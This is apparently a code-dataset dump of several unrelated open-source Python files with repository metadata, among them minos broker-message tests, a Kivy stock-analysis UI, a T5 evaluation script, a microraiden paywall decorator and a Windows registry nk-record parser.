    client.execute("update supply_center set id = 5, director_name = 'jbjbjb' where id = 2;")
    print(
        client.execute("select * from supply_center where id = '2' and director_name = 'test' or supply_center = 'center';"))
    client.close()
| 31.222222 | 125 | 0.608033 | 491 | 0.249619 | 0 | 0 | 0 | 0 | 0 | 0 | 636 | 0.323335 |
2ca379a4326599a2da6af793ac7003a964e86f56 | 11,677 | py | Python | packages/core/minos-microservice-networks/tests/test_networks/test_brokers/test_messages/test_models/test_v1.py | sorasful/minos-python | 1189330eebf6444627a2af6b29f347670f95a4dd | [
"MIT"
] | 247 | 2022-01-24T14:55:30.000Z | 2022-03-25T12:06:17.000Z | packages/core/minos-microservice-networks/tests/test_networks/test_brokers/test_messages/test_models/test_v1.py | sorasful/minos-python | 1189330eebf6444627a2af6b29f347670f95a4dd | [
"MIT"
] | 168 | 2022-01-24T14:54:31.000Z | 2022-03-31T09:31:09.000Z | packages/core/minos-microservice-networks/tests/test_networks/test_brokers/test_messages/test_models/test_v1.py | sorasful/minos-python | 1189330eebf6444627a2af6b29f347670f95a4dd | [
"MIT"
] | 21 | 2022-02-06T17:25:58.000Z | 2022-03-27T04:50:29.000Z | import unittest
import warnings
from unittest.mock import (
patch,
)
from uuid import (
UUID,
uuid4,
)
from minos.common import (
Model,
)
from minos.networks import (
BrokerMessageV1,
BrokerMessageV1Payload,
BrokerMessageV1Status,
BrokerMessageV1Strategy,
)
from tests.utils import (
FakeModel,
)
class TestBrokerMessageV1(unittest.TestCase):
    """Tests for BrokerMessageV1 construction, accessors and Avro round-trips."""

    def setUp(self) -> None:
        self.topic = "FooCreated"
        self.identifier = uuid4()
        self.reply_topic = "AddOrderReply"
        self.strategy = BrokerMessageV1Strategy.MULTICAST
        self.payload = BrokerMessageV1Payload(
            content=[FakeModel("blue"), FakeModel("red")], headers={"foo": "bar"}, status=BrokerMessageV1Status.ERROR
        )

    @staticmethod
    def _expected_avro_schema():
        """Avro schema of a BrokerMessageV1 carrying a list of FakeModel.

        Extracted into a helper because ``test_from_avro`` and
        ``test_avro_schema`` previously duplicated this literal verbatim.
        """
        return {
            "fields": [
                {"name": "topic", "type": "string"},
                {"name": "identifier", "type": {"logicalType": "uuid", "type": "string"}},
                {"name": "reply_topic", "type": ["string", "null"]},
                {
                    "name": "strategy",
                    "type": {
                        "logicalType": "minos.networks.brokers.messages.models.v1.BrokerMessageV1Strategy",
                        "type": "string",
                    },
                },
                {
                    "name": "payload",
                    "type": {
                        "fields": [
                            {
                                "name": "content",
                                "type": {
                                    "items": {
                                        "fields": [{"name": "data", "type": "string"}],
                                        "name": "FakeModel",
                                        "namespace": "tests.utils.hello",
                                        "type": "record",
                                    },
                                    "type": "array",
                                },
                            },
                            {
                                "name": "status",
                                "type": {
                                    "logicalType": "minos.networks.brokers.messages.models.v1.BrokerMessageV1Status",
                                    "type": "int",
                                },
                            },
                            {"name": "headers", "type": {"type": "map", "values": "string"}},
                        ],
                        "name": "BrokerMessageV1Payload",
                        "namespace": "minos.networks.brokers.messages.models.v1.hello",
                        "type": "record",
                    },
                },
                {"name": "version", "type": "int"},
            ],
            "name": "BrokerMessage",
            "namespace": "minos.networks.brokers.messages.models.abc.hello",
            "type": "record",
        }

    def _expected_avro_data(self):
        """Avro data dict for the message built in ``setUp`` (no reply topic set).

        Shared by ``test_from_avro`` and ``test_avro_data``, which previously
        duplicated this literal.
        """
        return {
            "identifier": str(self.identifier),
            "payload": {"content": [{"data": "blue"}, {"data": "red"}], "headers": {"foo": "bar"}, "status": 400},
            "reply_topic": None,
            "strategy": "unicast",
            "topic": "FooCreated",
            "version": 1,
        }

    def test_constructor_simple(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(self.topic, message.topic)
        self.assertIsInstance(message.identifier, UUID)
        self.assertEqual(None, message.reply_topic)
        self.assertEqual(BrokerMessageV1Strategy.UNICAST, message.strategy)
        self.assertEqual(self.payload, message.payload)

    def test_constructor(self):
        message = BrokerMessageV1(
            self.topic,
            identifier=self.identifier,
            reply_topic=self.reply_topic,
            strategy=self.strategy,
            payload=self.payload,
        )
        self.assertEqual(self.topic, message.topic)
        self.assertEqual(self.identifier, message.identifier)
        self.assertEqual(self.reply_topic, message.reply_topic)
        self.assertEqual(self.strategy, message.strategy)
        self.assertEqual(self.payload, message.payload)

    def test_version(self):
        self.assertEqual(1, BrokerMessageV1.version)

    def test_topic(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(self.topic, message.topic)

    def test_identifier(self):
        message = BrokerMessageV1(self.topic, self.payload, identifier=self.identifier)
        self.assertEqual(self.identifier, message.identifier)

    def test_reply_topic(self):
        message = BrokerMessageV1(self.topic, self.payload, reply_topic=self.reply_topic)
        self.assertEqual(self.reply_topic, message.reply_topic)

    def test_set_reply_topic(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertIsNone(message.reply_topic)
        message.set_reply_topic(self.reply_topic)
        self.assertEqual(self.reply_topic, message.reply_topic)

    def test_ok(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(self.payload.ok, message.ok)

    def test_status(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(self.payload.status, message.status)

    def test_headers(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(self.payload.headers, message.headers)

    def test_content(self):
        message = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(self.payload.content, message.content)

    def test_data(self):
        # ``data`` is a deprecated alias of ``content``; silence its warning.
        message = BrokerMessageV1(self.topic, self.payload)
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", DeprecationWarning)
            # noinspection PyDeprecation
            self.assertEqual(self.payload.content, message.data)

    def test_avro(self):
        # Full Avro bytes round-trip preserves equality.
        message = BrokerMessageV1(
            self.topic,
            identifier=self.identifier,
            reply_topic=self.reply_topic,
            strategy=self.strategy,
            payload=self.payload,
        )
        observed = BrokerMessageV1.from_avro_bytes(message.avro_bytes)
        self.assertEqual(message, observed)

    def test_sort(self):
        # Messages order by payload content; non-comparable contents keep
        # their relative positions.
        unsorted = [
            BrokerMessageV1("", BrokerMessageV1Payload("foo")),
            BrokerMessageV1("", BrokerMessageV1Payload(4)),
            BrokerMessageV1("", BrokerMessageV1Payload(2)),
            BrokerMessageV1("", BrokerMessageV1Payload(3)),
            BrokerMessageV1("", BrokerMessageV1Payload(1)),
            BrokerMessageV1("", BrokerMessageV1Payload("bar")),
        ]

        expected = [unsorted[0], unsorted[4], unsorted[2], unsorted[3], unsorted[1], unsorted[5]]
        observed = sorted(unsorted)
        self.assertEqual(expected, observed)

    def test_from_avro(self):
        expected = BrokerMessageV1(self.topic, self.payload, identifier=self.identifier)
        observed = Model.from_avro(self._expected_avro_schema(), self._expected_avro_data())
        self.assertEqual(expected, observed)

    def test_avro_schema(self):
        # Pin the random namespace suffix so the schema is deterministic.
        with patch("minos.common.AvroSchemaEncoder.generate_random_str", return_value="hello"):
            observed = BrokerMessageV1(self.topic, self.payload).avro_schema
        self.assertEqual([self._expected_avro_schema()], observed)

    def test_avro_data(self):
        observed = BrokerMessageV1(self.topic, self.payload, identifier=self.identifier).avro_data
        self.assertEqual(self._expected_avro_data(), observed)

    def test_avro_bytes(self):
        expected = BrokerMessageV1(self.topic, self.payload)
        self.assertEqual(expected, Model.from_avro_bytes(expected.avro_bytes))
class TestBrokerMessagePayload(unittest.TestCase):
    """Tests for the ``ok`` and deprecated ``data`` accessors of BrokerMessageV1Payload."""

    def setUp(self) -> None:
        self.content = [FakeModel("blue"), FakeModel("red")]

    def test_ok(self):
        # Only SUCCESS counts as ok; every other status is a failure.
        self.assertTrue(BrokerMessageV1Payload(self.content, status=BrokerMessageV1Status.SUCCESS).ok)
        for status in (
            BrokerMessageV1Status.ERROR,
            BrokerMessageV1Status.SYSTEM_ERROR,
            BrokerMessageV1Status.UNKNOWN,
        ):
            self.assertFalse(BrokerMessageV1Payload(self.content, status=status).ok)

    def test_data(self):
        # ``data`` is a deprecated alias of ``content``; silence its warning.
        payload = BrokerMessageV1Payload(self.content)
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", DeprecationWarning)
            # noinspection PyDeprecation
            self.assertEqual(self.content, payload.data)
class TestBrokerMessageV1Status(unittest.TestCase):
    """Check that raw integer codes map onto the expected status members."""

    def _assert_code(self, member, code):
        # Constructing the enum from the raw code must yield the member.
        self.assertEqual(member, BrokerMessageV1Status(code))

    def test_success(self):
        self._assert_code(BrokerMessageV1Status.SUCCESS, 200)

    def test_error(self):
        self._assert_code(BrokerMessageV1Status.ERROR, 400)

    def test_system_error(self):
        self._assert_code(BrokerMessageV1Status.SYSTEM_ERROR, 500)

    def test_unknown(self):
        self._assert_code(BrokerMessageV1Status.UNKNOWN, 56)
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
| 39.717687 | 117 | 0.525649 | 11,284 | 0.966344 | 0 | 0 | 0 | 0 | 0 | 0 | 2,092 | 0.179156 |
2ca60d18fc13936a81ea6a0a815cdddc87a28ba9 | 231 | py | Python | tasks/__init__.py | auto-ndp/faasm-python | f144332fea6d03412d5a76501bd5a9fe4c2fa8ac | [
"Apache-2.0"
] | 3 | 2021-08-05T05:09:36.000Z | 2021-11-29T23:59:35.000Z | tasks/__init__.py | auto-ndp/faasm-python | f144332fea6d03412d5a76501bd5a9fe4c2fa8ac | [
"Apache-2.0"
] | 1 | 2021-09-09T09:19:03.000Z | 2022-02-14T13:49:10.000Z | tasks/__init__.py | auto-ndp/faasm-python | f144332fea6d03412d5a76501bd5a9fe4c2fa8ac | [
"Apache-2.0"
] | 2 | 2021-07-06T13:06:06.000Z | 2021-08-21T00:02:02.000Z | from invoke import Collection
from . import (
container,
cpython,
func,
git,
libs,
mxnet,
runtime,
)
# Root invoke namespace: each imported task module becomes a sub-collection,
# so tasks are invoked as e.g. `inv container.<task>`.
ns = Collection(
    container,
    cpython,
    func,
    git,
    libs,
    mxnet,
    runtime,
)
2cab7c782174400d830c6863e839dd45a2ff2d54 | 2,416 | py | Python | face.py | 1MT3J45/DS-StockAnalysis | 20de4270a31e41324adc2c67ecb2343ff0c208c7 | [
"Apache-2.0"
] | null | null | null | face.py | 1MT3J45/DS-StockAnalysis | 20de4270a31e41324adc2c67ecb2343ff0c208c7 | [
"Apache-2.0"
] | null | null | null | face.py | 1MT3J45/DS-StockAnalysis | 20de4270a31e41324adc2c67ecb2343ff0c208c7 | [
"Apache-2.0"
] | null | null | null | from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.app import App
import YP03
import sys
import dfgui
import pandas as pd
Builder.load_string('''
<faceTool>:
num1: num1
result: result
orientation: 'vertical'
BoxLayout:
orientation: 'horizontal'
Label:
id: num1
text: 'Stock Data Analysis'
BoxLayout:
orientation: 'horizontal'
GridLayout:
cols: 6
Label:
id: blank1
Label:
id: blank2
Button:
text: 'Execute'
height: 10
width: 30
on_press: root.display_fun(self)
Label:
text: 'EMPTY SLOT'
height: 10
width: 30
on_press:
Button:
text: "Show XLS Sheet"
height: 10
width: 30
on_press: root.graph()
Button:
text: "Clear"
height: 10
width: 30
on_press: root.clear_screen()
BoxLayout:
orientation: 'horizontal'
Label:
id: result
GridLayout:
cols: 2
size_hint_y: None
Button:
text: "Clear"
on_press: root.clear_screen()
height: 10
width: 30
BubbleButton:
text: 'Exit'
on_press: root.exit_it()
height: 10
width: 30
''')
class face_app(App):
    """Kivy application shell; the root widget is a faceTool layout."""
    def build(self):
        return faceTool()
class faceTool(BoxLayout):
    """Root layout of the stock-analysis UI (widgets come from the kv rules).

    Exposes the callbacks wired up in the kv string: run the analysis,
    open the spreadsheet view, clear the output, and exit.
    """

    def __init__(self, **kwargs):
        super(faceTool, self).__init__(**kwargs)

    def display_fun(self, instance):
        """Run the clustering analysis and show the cluster names.

        Called when the *Execute* button is pressed.  (The previous
        docstring was copy-pasted from a calculator example and did not
        describe this widget.)  Names are rendered newest-first — i.e. in
        reverse order, one per line, with a trailing newline — exactly as
        the original prepend loop produced.
        """
        day_cluster_names, _length = YP03.execute()
        lines = [str(name) for name in day_cluster_names]
        if lines:
            self.result.text = '\n'.join(reversed(lines)) + '\n'
        else:
            self.result.text = ''

    def exit_it(self):
        """Terminate the application process."""
        sys.exit()

    def graph(self):
        """Open the spreadsheet view by importing ``main`` for its side effects.

        The dfgui-based preview was left disabled by the original author:
            xls = pd.read_excel('Res.xls'); dfgui.show(pd.DataFrame(xls))
        """
        import main

    def clear_screen(self):
        """Blank the result label."""
        self.result.text = ''
| 23.456311 | 68 | 0.500414 | 829 | 0.343129 | 0 | 0 | 0 | 0 | 0 | 0 | 1,631 | 0.675083 |
2cacb2562c5435003dd88d26fe7c1f1e9dad64af | 3,196 | py | Python | src/evaluation.py | Macho000/T5-for-KGQG | af139ff38ab2965560e809d5ab5182a0cfff6f71 | [
"Apache-2.0"
] | null | null | null | src/evaluation.py | Macho000/T5-for-KGQG | af139ff38ab2965560e809d5ab5182a0cfff6f71 | [
"Apache-2.0"
] | null | null | null | src/evaluation.py | Macho000/T5-for-KGQG | af139ff38ab2965560e809d5ab5182a0cfff6f71 | [
"Apache-2.0"
] | 1 | 2021-11-18T08:03:28.000Z | 2021-11-18T08:03:28.000Z | from AdjacencyAttentionWithoutSelfloopTransformers import (
AdamW,
T5ForConditionalGeneration,
T5Tokenizer,
get_linear_schedule_with_warmup
)
from torch.utils.data import DataLoader
from src.dataset import JsonDatasetWQ, JsonDatasetPQ
from datetime import strftime, localtime
from tqdm.auto import tqdm
from omegaconf import OmegaConf
import pandas as pd
from core.evaluation.eval import QGEvalCap
OmegaConf.register_new_resolver("now", lambda pattern: strftime(pattern, localtime()))
def saveOutputs(inputs: list, outputs: list, targets: list,
                path: str = "out/outputs.csv") -> None:
    """Persist aligned model inputs/outputs/targets as a CSV file.

    Args:
        inputs: decoded input texts, one per example.
        outputs: decoded model predictions, aligned with ``inputs``.
        targets: gold reference texts, aligned with ``inputs``.
        path: destination CSV path (default keeps the original behavior).
            Parent directories are created if missing — previously the call
            crashed when the ``out/`` directory did not exist.
    """
    from pathlib import Path  # local import: keeps module-level deps unchanged

    destination = Path(path)
    destination.parent.mkdir(parents=True, exist_ok=True)
    frame = pd.DataFrame(
        list(zip(inputs, outputs, targets)),
        columns=["inputs", "outputs", "targets"],
    )
    frame.to_csv(destination, index=False, header=True)
def run_eval(target_src, decoded_text):
    """Score generated questions against references with the QG eval suite.

    Args:
        target_src: list of reference (gold) question strings.
        decoded_text: list of generated question strings, aligned by index.

    Returns:
        The score mapping produced by ``QGEvalCap.evaluate()``.  (The old
        signature declared ``-> None`` although the scores were returned.)
    """
    assert len(target_src) == len(decoded_text)
    # QGEvalCap expects {example_id: [sentence, ...]} on both sides.
    eval_targets = {idx: [ref] for idx, ref in enumerate(target_src)}
    eval_predictions = {idx: [hyp] for idx, hyp in enumerate(decoded_text)}
    QGEval = QGEvalCap(eval_targets, eval_predictions)
    scores = QGEval.evaluate()
    return scores
class Evaluation():
    """Run the trained T5 question generator on the test split and score it.

    Expects ``hparams`` to provide ``experiment.{model_dir,data,data_dir}``,
    ``model.{max_input_length,max_target_length}`` and ``training.n_gpu``.
    """
    def __init__(self, hparams):
        self.hparams = hparams
    def run(self):
        # Tokenizer
        tokenizer = T5Tokenizer.from_pretrained(self.hparams.experiment.model_dir, is_fast=True)
        trained_model = T5ForConditionalGeneration.from_pretrained(self.hparams.experiment.model_dir)
        # import test data
        # NOTE(review): test_dataset is only assigned for "mhqg-wq"; any other
        # dataset name raises NameError on the DataLoader line below — confirm.
        if self.hparams.experiment.data=="mhqg-wq":
            test_dataset = JsonDatasetWQ(tokenizer, self.hparams.experiment.data_dir, "test.json",
                                         input_max_len=self.hparams.model.max_input_length,
                                         target_max_len=self.hparams.model.max_target_length)
        test_loader = DataLoader(test_dataset, batch_size=8, num_workers=4)
        trained_model.eval()
        inputs = []
        outputs = []
        targets = []
        for index, batch in enumerate(tqdm(test_loader)):
            input_ids = batch['source_ids']
            input_mask = batch['source_mask']
            # training.n_gpu doubles as a "use CUDA" switch here.
            if self.hparams.training.n_gpu:
                input_ids = input_ids.cuda()
                input_mask = input_mask.cuda()
            output = trained_model.generate(input_ids=input_ids,
                                            attention_mask=input_mask,
                                            max_length=self.hparams.model.max_target_length,
                                            temperature=1.0,  # temperature parameter adding randomness to generation
                                            repetition_penalty=1.5,  # penalty against repeating the same sentence (mode collapse)
                                            )
            output_text = [tokenizer.decode(ids, skip_special_tokens=True,
                                            clean_up_tokenization_spaces=False)
                           for ids in output]
            target_text = [tokenizer.decode(ids, skip_special_tokens=True,
                                            clean_up_tokenization_spaces=False)
                           for ids in batch["target_ids"]]
            # Inputs keep special tokens so the serialized graph is visible.
            input_text = [tokenizer.decode(ids, skip_special_tokens=False,
                                           clean_up_tokenization_spaces=False)
                          for ids in input_ids]
            inputs.extend(input_text)
            outputs.extend(output_text)
            targets.extend(target_text)
        # Persist the triples and compute BLEU/METEOR/etc. over all examples.
        saveOutputs(inputs, outputs, targets)
        run_eval(targets, outputs)
2cad739bc31ee265b9975569c0caf1767fa299a5 | 7,344 | py | Python | microraiden/proxy/resources/paywall_decorator.py | andrevmatos/microraiden | 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | [
"MIT"
] | 417 | 2017-09-19T19:06:23.000Z | 2021-11-28T05:39:23.000Z | microraiden/proxy/resources/paywall_decorator.py | andrevmatos/microraiden | 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | [
"MIT"
] | 259 | 2017-09-19T20:42:57.000Z | 2020-11-18T01:31:41.000Z | microraiden/proxy/resources/paywall_decorator.py | andrevmatos/microraiden | 2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd | [
"MIT"
] | 126 | 2017-09-19T17:11:39.000Z | 2020-12-17T17:05:27.000Z | import logging
from flask import Response, make_response, request
from microraiden import HTTPHeaders as header
from flask_restful.utils import unpack
from microraiden.channel_manager import (
ChannelManager,
)
from microraiden.exceptions import (
NoOpenChannel,
InvalidBalanceProof,
InvalidBalanceAmount,
InsufficientConfirmations
)
import microraiden.constants as constants
from microraiden.proxy.resources.request_data import RequestData
from functools import wraps
from eth_utils import is_address
log = logging.getLogger(__name__)
class Paywall(object):
    """Flask paywall gate backed by a µRaiden channel manager.

    Free resources (price == 0) are served directly; paid resources require
    a valid balance proof transmitted via the RDN-* headers/cookies.
    """

    def __init__(self,
                 channel_manager,
                 light_client_proxy=None
                 ):
        super().__init__()
        assert isinstance(channel_manager, ChannelManager)
        assert is_address(channel_manager.channel_manager_contract.address)
        assert is_address(channel_manager.receiver)
        self.contract_address = channel_manager.channel_manager_contract.address
        self.receiver_address = channel_manager.receiver
        self.channel_manager = channel_manager
        self.light_client_proxy = light_client_proxy

    def access(self, resource, method, *args, **kwargs):
        """Serve ``resource`` via ``method``, enforcing payment when priced.

        Returns a Flask Response or a (body, status[, headers]) tuple,
        mirroring whatever ``method`` itself may return.
        """
        if self.channel_manager.node_online() is False:
            return "Ethereum node is not responding", 502
        if self.channel_manager.get_eth_balance() < constants.PROXY_BALANCE_LIMIT:
            return "Channel manager ETH balance is below limit", 502
        try:
            data = RequestData(request.headers, request.cookies)
        except ValueError as e:
            return str(e), 409
        # Browsers (explicit text/html Accept) get the HTML paywall page;
        # API clients get a bare 402 with machine-readable headers.
        accepts_html = (
            'text/html' in request.accept_mimetypes and
            request.accept_mimetypes.best != '*/*'
        )
        headers = {}
        price = resource.price()
        # payment required
        if price > 0:
            paywall, headers = self.paywall_check(price, data)
            if paywall and accepts_html is True:
                reply_data = resource.get_paywall(request.path)
                return self.reply_webui(reply_data, headers)
            elif paywall:
                return make_response('', 402, headers)
        # all ok, return actual content
        resp = method(request.path, *args, **kwargs)
        # merge headers, resource headers take precedence
        headers_lower = {key.lower(): value for key, value in headers.items()}
        lower_to_case = {key.lower(): key for key in headers}
        if isinstance(resp, Response):
            resource_headers = (key for key, value in resp.headers)
        else:
            data, code, resource_headers = unpack(resp)
        for key in resource_headers:
            key_lower = key.lower()
            if key_lower in headers_lower:
                headers.pop(lower_to_case[key_lower])
        if isinstance(resp, Response):
            resp.headers.extend(headers)
            return resp
        else:
            headers.update(resource_headers)
            # NOTE(review): the merged `headers` dict is discarded here and
            # only `resource_headers` is sent — looks unintended; confirm
            # whether `headers` should be passed to make_response instead.
            return make_response(str(data), code, resource_headers)

    def paywall_check(self, price, data):
        """Check if the resource can be sent to the client.

        Returns (is_paywalled: Bool, http_headers: dict).
        """
        headers = self.generate_headers(price)
        if not data.balance_signature:
            return True, headers
        # try to get an existing channel
        try:
            channel = self.channel_manager.verify_balance_proof(
                data.sender_address, data.open_block_number,
                data.balance, data.balance_signature)
        except InsufficientConfirmations as e:
            log.debug('Refused payment: Insufficient confirmations (sender=%s, block=%d)' %
                      (data.sender_address, data.open_block_number))
            headers.update({header.INSUF_CONFS: "1"})
            return True, headers
        except NoOpenChannel as e:
            log.debug('Refused payment: Channel does not exist (sender=%s, block=%d)' %
                      (data.sender_address, data.open_block_number))
            headers.update({header.NONEXISTING_CHANNEL: "1"})
            return True, headers
        except InvalidBalanceAmount as e:
            log.debug('Refused payment: Invalid balance amount: %s (sender=%s, block=%d)' %
                      (str(e), data.sender_address, data.open_block_number))
            headers.update({header.INVALID_PROOF: 1})
            return True, headers
        except InvalidBalanceProof as e:
            log.debug('Refused payment: Invalid balance proof: %s (sender=%s, block=%d)' %
                      (str(e), data.sender_address, data.open_block_number))
            headers.update({header.INVALID_PROOF: 1})
            return True, headers
        # set headers to reflect channel state
        assert channel.sender is not None
        assert channel.balance >= 0
        headers.update(
            {
                header.SENDER_ADDRESS: channel.sender,
                header.SENDER_BALANCE: channel.balance
            })
        if channel.last_signature is not None:
            headers.update({header.BALANCE_SIGNATURE: channel.last_signature})
        amount_sent = data.balance - channel.balance
        if amount_sent != 0 and amount_sent != price:
            headers[header.INVALID_AMOUNT] = 1
            # if difference is 0, it will be handled by channel manager
            return True, headers
        # set the headers to reflect actual state of a channel
        try:
            self.channel_manager.register_payment(
                channel.sender,
                data.open_block_number,
                data.balance,
                data.balance_signature)
        except (InvalidBalanceAmount, InvalidBalanceProof):
            # balance sent to the proxy is less than in the previous proof
            return True, headers
        # all ok, return premium content
        return False, headers

    def generate_headers(self, price: int):
        """Generate basic headers that are sent back for every request."""
        # Docstring previously sat *after* this assert, so it was a no-op
        # expression rather than documentation.
        assert price > 0
        headers = {
            header.GATEWAY_PATH: constants.API_PATH,
            header.RECEIVER_ADDRESS: self.receiver_address,
            header.CONTRACT_ADDRESS: self.contract_address,
            header.TOKEN_ADDRESS: self.channel_manager.get_token_address(),
            header.PRICE: price,
            'Content-Type': 'application/json'
        }
        return headers

    def reply_webui(self, reply_data='', headers: dict = None):
        """Render the HTML paywall page, echoing RDN-* values as cookies."""
        # Fixed: the old signature used the mutable default `headers: dict={}`,
        # which is shared across calls.
        headers = {} if headers is None else headers
        headers.update({
            "Content-Type": "text/html",
        })
        reply = make_response(reply_data, 402, headers)
        for k, v in headers.items():
            if k.startswith('RDN-'):
                reply.set_cookie(k, str(v))
        return reply
def paywall_decorator(func):
    """Wrap a bound Resource method so every call goes through the paywall.

    Intended for Flask-RESTful resources::

        class MyPaywalledResource(Resource):
            method_decorators = [paywall_decorator]
    """
    @wraps(func)
    def paywalled(*call_args, **call_kwargs):
        # Resolve the owning instance of the bound method at call time.
        owner = func.__self__
        return owner.paywall.access(owner, func, *call_args, **call_kwargs)

    return paywalled
| 37.661538 | 91 | 0.623094 | 6,277 | 0.854711 | 0 | 0 | 233 | 0.031727 | 0 | 0 | 1,264 | 0.172113 |
2cade70f70dd65b64ba83b86b7c197557db3d502 | 4,241 | py | Python | aiowinreg/filestruct/nk.py | skelsec/aiowinreg | fdffebefb355fb773a0c3f30b2439774db930ba1 | [
"MIT"
] | 6 | 2019-08-20T21:40:28.000Z | 2021-05-22T18:45:41.000Z | aiowinreg/filestruct/nk.py | skelsec/aiowinreg | fdffebefb355fb773a0c3f30b2439774db930ba1 | [
"MIT"
] | 3 | 2020-01-15T17:32:23.000Z | 2021-05-22T04:07:42.000Z | aiowinreg/filestruct/nk.py | skelsec/aiowinreg | fdffebefb355fb773a0c3f30b2439774db930ba1 | [
"MIT"
] | 5 | 2019-08-09T04:03:57.000Z | 2020-03-19T10:22:56.000Z |
"""
the nk-Record
=============
Offset Size Contents
0x0000 Word ID: ASCII-"nk" = 0x6B6E
0x0002 Word for the root-key: 0x2C, otherwise 0x20
0x0004 Q-Word write-date/time in windows nt notation
0x0010 D-Word Offset of Owner/Parent key
0x0014 D-Word number of sub-Keys
0x001C D-Word Offset of the sub-key lf-Records
0x0024 D-Word number of values
0x0028 D-Word Offset of the Value-List
0x002C D-Word Offset of the sk-Record
0x0030 D-Word Offset of the Class-Name
0x0044 D-Word Unused (data-trash)
0x0048 Word name-length
0x004A Word class-name length
0x004C ???? key-name
"""
import io
import enum
class NKFlag(enum.IntFlag):
    """Bit flags of an nk (key node) record header (word at offset 0x0002)."""
    UNK1 = 0x4000 # unknown; shows up on normal-seeming keys in Vista and W2K3 hives
    UNK2 = 0x1000 # unknown; shows up on normal-seeming keys in Vista and W2K3 hives
    UNK3 = 0x0080 # unknown; shows up on root keys in some Vista "software" hives
    PREDEFINED_HANDLE = 0x0040 # predefined handle
    ASCII_NAME = 0x0020 # key name is ASCII if set, otherwise UTF-16LE
    SYMLINK = 0x0010 # symlink key
    NO_DELETE = 0x0008 # this key cannot be deleted
    ROOT = 0x0004 # key is the root of a registry hive
    FOREIGN_MOUNT = 0x0002 # mount point of another hive
    VOLATILE = 0x0001 # volatile key (original comment was cut off mid-sentence)
class NTRegistryNK:
	"""An ``nk`` (key node) record of an NT registry hive.

	Field layout follows the on-disk structure described in the module
	docstring.  Attribute names mirror the original implementation,
	including the historical ``wite_time`` typo, kept for backward
	compatibility with existing callers.
	"""
	def __init__(self):
		self.magic = b'nk'
		self.flags = None
		self.wite_time = None  # last-write FILETIME, kept as raw 8 bytes
		self.owner_offset = None  # offset of owner/parent key
		self.u1 = None  # unknown dword
		self.subkey_cnt_stable = None
		self.subkey_cnt = None
		self.offset_lf_stable = None
		self.offset_lf = None  # offset of the sub-key lf-record
		self.value_cnt = None
		self.offset_value_list = None
		self.offset_sk = None  # offset of the sk (security) record
		self.offset_classname = None
		self.sk_name_max = None
		self.sk_classname_max = None
		self.vl_name_max = None
		self.vl_max = None
		self.unknown = None
		self.name_length = None
		self.class_name_length = None
		self.name = None
		self.raw_data = None

	@staticmethod
	def nameparse(data):
		"""Cheaply parse only flags and key name out of raw record bytes."""
		nk = NTRegistryNK()
		nk.raw_data = data
		nk.flags = NKFlag(int.from_bytes(data[2:4], 'little', signed=False))
		nk.name_length = int.from_bytes(data[72:74], 'little', signed=False)
		encoding = 'iso-8859-15' if NKFlag.ASCII_NAME in nk.flags else 'utf-16-le'
		# Name starts right after the 76-byte fixed header.  The original
		# wrapped this in a try/except that only re-raised; removed as a no-op.
		nk.name = data[76:76 + nk.name_length].decode(encoding)
		return nk

	@staticmethod
	def from_bytes(data):
		"""Parse a full nk record from a bytes object."""
		return NTRegistryNK.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		"""Parse a full nk record from a stream positioned at the magic."""
		def u32(b):
			# Little-endian unsigned dword; all fixed fields use this shape.
			return int.from_bytes(b.read(4), 'little', signed=False)

		nk = NTRegistryNK()
		nk.magic = buff.read(2)
		assert nk.magic == b'nk'
		nk.flags = NKFlag(int.from_bytes(buff.read(2), 'little', signed=False))
		nk.wite_time = buff.read(8)
		nk.owner_offset = u32(buff)
		nk.u1 = u32(buff)
		nk.subkey_cnt_stable = u32(buff)
		nk.subkey_cnt = u32(buff)
		nk.offset_lf_stable = u32(buff)
		nk.offset_lf = u32(buff)
		nk.value_cnt = u32(buff)
		nk.offset_value_list = u32(buff)
		nk.offset_sk = u32(buff)
		nk.offset_classname = u32(buff)
		nk.sk_name_max = u32(buff)
		nk.sk_classname_max = u32(buff)
		nk.vl_name_max = u32(buff)
		nk.vl_max = u32(buff)
		nk.unknown = u32(buff)
		nk.name_length = int.from_bytes(buff.read(2), 'little', signed=False)
		nk.class_name_length = int.from_bytes(buff.read(2), 'little', signed=False)
		encoding = 'iso-8859-15' if NKFlag.ASCII_NAME in nk.flags else 'utf-16-le'
		nk.name = buff.read(nk.name_length).decode(encoding)
		return nk

	def __str__(self):
		t = '== NT Registry NK block ==\r\n'
		for k in self.__dict__:
			t += '%s: %s \r\n' % (k, self.__dict__[k])
		return t
| 33.928 | 88 | 0.710446 | 3,637 | 0.857177 | 0 | 0 | 2,221 | 0.52345 | 0 | 0 | 1,275 | 0.300495 |
2caf9720b899a568e29bea30f685e67528d45e67 | 85 | py | Python | src/datasets/hanitem.py | Hazoom/han | 5c97568fc052f85db3e3b643a56c782ca24044a1 | [
"Apache-2.0"
] | 25 | 2020-07-25T09:45:45.000Z | 2022-01-02T09:42:59.000Z | src/datasets/hanitem.py | Hazoom/han | 5c97568fc052f85db3e3b643a56c782ca24044a1 | [
"Apache-2.0"
] | 3 | 2020-12-14T22:32:47.000Z | 2021-04-16T01:06:44.000Z | src/datasets/hanitem.py | Hazoom/han | 5c97568fc052f85db3e3b643a56c782ca24044a1 | [
"Apache-2.0"
] | 6 | 2020-12-20T16:00:44.000Z | 2021-12-07T16:59:07.000Z | import attr
@attr.s
class HANItem:
sentences = attr.ib()
label = attr.ib()
| 10.625 | 25 | 0.623529 | 62 | 0.729412 | 0 | 0 | 70 | 0.823529 | 0 | 0 | 0 | 0 |
